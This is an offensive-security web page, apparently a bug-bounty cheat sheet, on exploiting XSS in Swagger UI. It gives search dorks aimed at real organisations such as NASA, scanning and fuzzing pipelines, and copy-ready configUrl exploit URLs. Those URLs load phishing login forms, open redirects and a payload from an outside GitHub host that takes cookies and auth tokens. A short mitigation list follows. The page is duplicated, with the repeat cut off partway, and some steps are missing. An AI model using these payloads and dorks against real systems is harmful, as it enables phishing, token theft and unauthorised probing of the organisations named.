Swagger XSS Vulnerabilities

Exploiting Cross-Site Scripting in Swagger UI and OpenAPI documentation interfaces. Complete guide with dorks, automation, and bypass techniques.

12 Categories40+ CommandsCopy Ready

Phase 1

Google Dorks - Find Exposed APIs

1#1 Find non-root subdomains of swagger.io with exposed Swagger UI

site:*.swagger.io -www

2#2 Find Swagger UI on a specific target domain

intext:"Swagger UI" intitle:"Swagger UI" site:Target.com

3#3 Search for Swagger endpoints on NASA's domain

site:nasa.gov inurl:(swagger-ui OR swagger.json OR swagger.yaml)

4#4 Locate default Swagger UI paths

inurl:"/swagger-ui/index.html"

5#5 Advanced: Multiple paths on NASA, filtering dev platforms

intitle:"Swagger UI" (inurl:"/swagger-ui/" OR inurl:"/swagger/" OR inurl:"/api-docs/" OR inurl:"/v2/api-docs" OR inurl:"/v3/api-docs" OR inurl:"swagger.json" OR inurl:"swagger.yaml") -github -gitlab -stackoverflow site:nasa.gov

6#6 Find exposed API spec files in common API folders on NASA

site:nasa.gov (inurl:api OR inurl:apis OR inurl:graphql OR inurl:swagger OR inurl:v1 OR inurl:v2 OR inurl:v3) (filetype:json OR filetype:yaml OR filetype:xml)

Phase 2

Automating Google Dork Results

1Extract unique domains from swagger.txt using awk

cat swagger.txt | awk -F/ '{print $3}' | sort -u

2Pipe discovered domains to Nuclei for Swagger scanning

cat swagger.txt | awk -F/ '{print $3}' | sort -u | nuclei -t swagger.yaml

3Use Python script for automated dorking (reference: https://sites.google.com/site/linkgopher)

python dorking.py

Phase 3

GitHub Dorks - Find Vulnerable Versions

1#1 Find outdated Swagger UI versions 3.1-3.3 in GitHub repos

"/swagger-ui-dist\": \"3.[1-3]/\"" path:*/package.json

2#2 Search GitHub repo for hardcoded URLs/endpoints (e.g., repo:strapi/strapi)

repo:ORG/REPO ("https://" OR "http://" OR ".com")

Phase 4

Censys - Find Public Swagger UIs

1#1 Censys: Find Swagger keywords in HTTP response bodies using host field

host.services.endpoints.http.body:{"swagger", "swagger-ui"}

2#2 Censys: Alternative search using web.endpoints.http.body field

web.endpoints.http.body:{"swagger", "swagger-ui"}

3#3 Censys: Search for Swagger on NASA infrastructure

nasa AND host.services.endpoints.http.body:{"swagger", "swagger-ui"} OR web.endpoints.http.body:{"swagger", "swagger-ui"}

4#4 Censys: Find Swagger UIs on NASA-tagged IPs with response analysis

(nasa AND host.services.endpoints.http.body:{"swagger", "swagger-ui"} OR web.endpoints.http.body:{"swagger", "swagger-ui"}) AND host.ip:*

Phase 5

Fofa - Find Swagger Interfaces

1Fofa: Find Swagger UIs using icon hash detection on redacted.com

"redacted.com" && (icon_hash="-1180440057" || icon_hash="-1128940573" || icon_hash="-1839822816" || icon_hash="1120729672")

Phase 6

Shodan - Exposed Swagger Interfaces

1#1 Shodan: Detect services with Swagger identified in components

http.component:"Swagger"

2#2 Shodan: Search for pages titled Swagger UI

http.title:"Swagger UI"

3#3 Shodan: Find pages containing swagger-ui in HTML body

http.html:"swagger-ui"

4#4 Shodan: Combined filter for highly accurate Swagger UI detection

http.component:"Swagger" http.title:"Swagger UI" http.html:"swagger-ui"

5#5 Shodan: Look for Swagger UI returning 200 OK

http.title:"Swagger UI" +200

6#6 Shodan: Find Swagger UIs on a specific domain (e.g., getsling.com)

http.title:"Swagger UI" hostname:"getsling.com"

Phase 8

Automation with Subfinder and Httpx

1#1 Find Swagger UI on all subdomains of a target

subfinder -d target.com -all | httpx-toolkit -silent -title | grep "Swagger UI"

2#2 Detect Swagger, OpenAPI, Redoc, or RapiDoc on a list of domains

3#3 Probe common Swagger documentation paths on a single domain

echo "example.com" | httpx -path /docs,/swagger,/api-docs,/swagger-ui,/swagger-ui.html

Phase 9

Path Brute-Forcing with Custom Wordlists

1Fuzz for Swagger paths using custom wordlist and alive domains

ffuf -w /root/wordlist/api/swagger_xss.txt:FUZZ -w alive_ones.txt:URL -u URLFUZZ -mc 200 -o ffuf-result.txt

2Dirsearch with multiple extensions for Swagger files

dirsearch -u https://api.getsling.com -w payloads/swagger.txt -e html,json,yaml,js -t 20 --random-agent --force-recursive --full-url

3Reference: Swagger wordlist by CoffinXP

https://github.com/coffinxp/swagger/blob/main/swagger-wordlist.txt

Phase 10

DOM XSS via Swagger UI - Jamf Pro

1Jamf Pro: Load custom Swagger login form template for phishing

https://VULNERABLE_JAMF/classicapi/doc/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9zdGFuZGluZy5zaGlyb3VwL3Byb2plY3RzL3dlYmhhY2tpbmdfcGxheW5kL2hlbHBlcnMvc3dhZ2dlciJ9

2Jamf Pro: Test open redirect behavior via redirecting login config

https://VULNERABLE_JAMF/classicapi/doc/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHViVXNlcmNvbnRlbnQuY29tL3Byb2plY3RzL3dlYmhhY2tpbmdfcGxheW5kL2hlbHBlcnMvcmVkdXJpLnB4N3UifQ==

3Jamf Pro: Trigger basic XSS payload to check for DOM-based vulnerabilities

https://VULNERABLE_JAMF/classicapi/doc/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHViVXNlcmNvbnRlbnQuY29tL3Byb2plY3RzL3dlYmhhY2tpbmdfcGxheW5kL2hlbHBlcnMveHNzdGVzdC5qc29uIn0=

4If vulnerable: extract auth token from localStorage

alert(localStorage.getItem('authToken'))

Phase 11

DOM XSS & HTML Injection & Open Redirect

1#1 Loads a custom Swagger login form template for login phishing

https://site.com/?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/login.json

2#2 Tests open redirect behavior via a redirecting login config

https://site.com/?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/rlogin.json

3#3 Triggers a basic XSS payload to check for DOM-based vulnerabilities

https://site.com/?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsstest.json

4#4 Executes a script to exfiltrate cookies or auth tokens from localStorage

https://site.com/?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsscookie.json

Phase 12

Mitigation - How Developers Can Prevent

1Avoid exposing Swagger documentation on live or customer-facing systems

# Disable Swagger UI in production environments

2Protect Swagger routes with Basic Auth, token-based auth, or IP whitelisting

# Require authentication for accessing Swagger UI

3Use a strict whitelist of allowed domains or remove support for remote schema loading

# Validate and sanitize query parameters like ?url=

4Stay updated with newest releases to patch known vulnerabilities

# Use the latest stable version of Swagger UI

5Sanitize any dynamic data rendered within Swagger UI templates

# Apply consistent input validation and escaping

Reference

Version-Specific Vulnerabilities

Swagger UI 2.x

High

Vulnerabilities

configUrl parameter injection
Reflected XSS via query parameters
OpenAPI spec injection in info fields
Unsanitized parameter names/descriptions

Swagger UI 3.x (modern)

Medium

Vulnerabilities

URL parameter injection (url, configUrl)
DOM XSS via client-side rendering
OpenAPI spec injection
Template injection in some implementations

Swagger UI 4.x+ (latest)

Low

Vulnerabilities

Reduced attack surface with CSP
Some XSS via custom plugins
Misconfigured OAuth/OIDC flows
Reflected XSS if CSP bypassed

Tools

Tools & Resources

Link Gopher Browser Extension

Bulk open Swagger UIs and manually test each interface for vulnerabilities

CoffinXP Swagger Repository

Complete Swagger XSS testing repository with payloads and configs

Swagger Wordlist

Custom wordlist for fuzzing Swagger endpoints

Video: Complete Practical Guide

YouTube video showing complete practical implementation of Swagger XSS method

Swagger XSS Vulnerabilities

Exploiting Cross-Site Scripting in Swagger UI and OpenAPI documentation interfaces. Complete guide with dorks, automation, and bypass techniques.

12 Categories40+ CommandsCopy Ready

Phase 1

Google Dorks - Find Exposed APIs

1#1 Find non-root subdomains of swagger.io with exposed Swagger UI

site:*.swagger.io -www

2#2 Find Swagger UI on a specific target domain

intext:"Swagger UI" intitle:"Swagger UI" site:Target.com

3#3 Search for Swagger endpoints on NASA's domain

site:nasa.gov inurl:(swagger-ui OR swagger.json OR swagger.yaml)

4#4 Locate default Swagger UI paths

inurl:"/swagger-ui/index.html"

5#5 Advanced: Multiple paths on NASA, filtering dev platforms

intitle:"Swagger UI" (inurl:"/swagger-ui/" OR inurl:"/swagger/" OR inurl:"/api-docs/" OR inurl:"/v2/api-docs" OR inurl:"/v3/api-docs" OR inurl:"swagger.json" OR inurl:"swagger.yaml") -github -gitlab -stackoverflow site:nasa.gov

6#6 Find exposed API spec files in common API folders on NASA

site:nasa.gov (inurl:api OR inurl:apis OR inurl:graphql OR inurl:swagger OR inurl:v1 OR inurl:v2 OR inurl:v3) (filetype:json OR filetype:yaml OR filetype:xml)

Phase 2

Automating Google Dork Results

1Extract unique domains from swagger.txt using awk

cat swagger.txt | awk -F/ '{print $3}' | sort -u

2Pipe discovered domains to Nuclei for Swagger scanning

cat swagger.txt | awk -F/ '{print $3}' | sort -u | nuclei -t swagger.yaml

3Use Python script for automated dorking (reference: https://sites.google.com/site/linkgopher)

python dorking.py

Phase 3

GitHub Dorks - Find Vulnerable Versions

1#1 Find outdated Swagger UI versions 3.1-3.3 in GitHub repos

"/swagger-ui-dist\": \"3.[1-3]/\"" path:*/package.json

2#2 Search GitHub repo for hardcoded URLs/endpoints (e.g., repo:strapi/strapi)

repo:ORG/REPO ("https://" OR "http://" OR ".com")

Phase 4

Censys - Find Public Swagger UIs

1#1 Censys: Find Swagger keywords in HTTP response bodies using host field

host.services.endpoints.http.body:{"swagger", "swagger-ui"}

2#2 Censys: Alternative search using web.endpoints.http.body field

web.endpoints.http.body:{"swagger", "swagger-ui"}

3#3 Censys: Search for Swagger on NASA infrastructure

nasa AND host.services.endpoints.http.body:{"swagger", "swagger-ui"} OR web.endpoints.http.body:{"swagger", "swagger-ui"}

4#4 Censys: Find Swagger UIs on NASA-tagged IPs with response analysis

(nasa AND host.services.endpoints.http.body:{"swagger", "swagger-ui"} OR web.endpoints.http.body:{"swagger", "swagger-ui"}) AND host.ip:*

Phase 5

Fofa - Find Swagger Interfaces

1Fofa: Find Swagger UIs using icon hash detection on redacted.com

"redacted.com" && (icon_hash="-1180440057" || icon_hash="-1128940573" || icon_hash="-1839822816" || icon_hash="1120729672")

Phase 6

Shodan - Exposed Swagger Interfaces

1#1 Shodan: Detect services with Swagger identified in components

http.component:"Swagger"

2#2 Shodan: Search for pages titled Swagger UI

http.title:"Swagger UI"

3#3 Shodan: Find pages containing swagger-ui in HTML body

http.html:"swagger-ui"

4#4 Shodan: Combined filter for highly accurate Swagger UI detection

http.component:"Swagger" http.title:"Swagger UI" http.html:"swagger-ui"

5#5 Shodan: Look for Swagger UI returning 200 OK

http.title:"Swagger UI" +200

6#6 Shodan: Find Swagger UIs on a specific domain (e.g., getsling.com)

http.title:"Swagger UI" hostname:"getsling.com"

Phase 8

Automation with Subfinder and Httpx

1#1 Find Swagger UI on all subdomains of a target

subfinder -d target.com -all | httpx-toolkit -silent -title | grep "Swagger UI"

2#2 Detect Swagger, OpenAPI, Redoc, or RapiDoc on a list of domains

3#3 Probe common Swagger documentation paths on a single domain

echo "example.com" | httpx -path /docs,/swagger,/api-docs,/swagger-ui,/swagger-ui.html

Phase 9

Path Brute-Forcing with Custom Wordlists

1Fuzz for Swagger paths using custom wordlist and alive domains

ffuf -w /root/wordlist/api/swagger_xss.txt:FUZZ -w alive_ones.txt:URL -u URLFUZZ -mc 200 -o ffuf-result.txt

2Dirsearch with multiple extensions for Swagger files

dirsearch -u https://api.getsling.com -w payloads/swagger.txt -e html,json,yaml,js -t 20 --random-agent --force-recursive --full-url

3Reference: Swagger wordlist by CoffinXP

https://github.com/coffinxp/swagger/blob/main/swagger-wordlist.txt

Phase 10

DOM XSS via Swagger UI - Jamf Pro

1Jamf Pro: Load custom Swagger login form template for phishing

https://VULNERABLE_JAMF/classicapi/doc/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9zdGFuZGluZy5zaGlyb3VwL3Byb2plY3RzL3dlYmhhY2tpbmdfcGxheW5kL2hlbHBlcnMvc3dhZ2dlciJ9

2Jamf Pro: Test open redirect behavior via redirecting login config

https://VULNERABLE_JAMF/classicapi/doc/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHViVXNlcmNvbnRlbnQuY29tL3Byb2plY3RzL3dlYmhhY2tpbmdfcGxheW5kL2hlbHBlcnMvcmVkdXJpLnB4N3UifQ==

3Jamf Pro: Trigger basic XSS payload to check for DOM-based vulnerabilities

https://VULNERABLE_JAMF/classicapi/doc/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHViVXNlcmNvbnRlbnQuY29tL3Byb2plY3RzL3dlYmhhY2tpbmdfcGxheW5kL2hlbHBlcnMveHNzdGVzdC5qc29uIn0=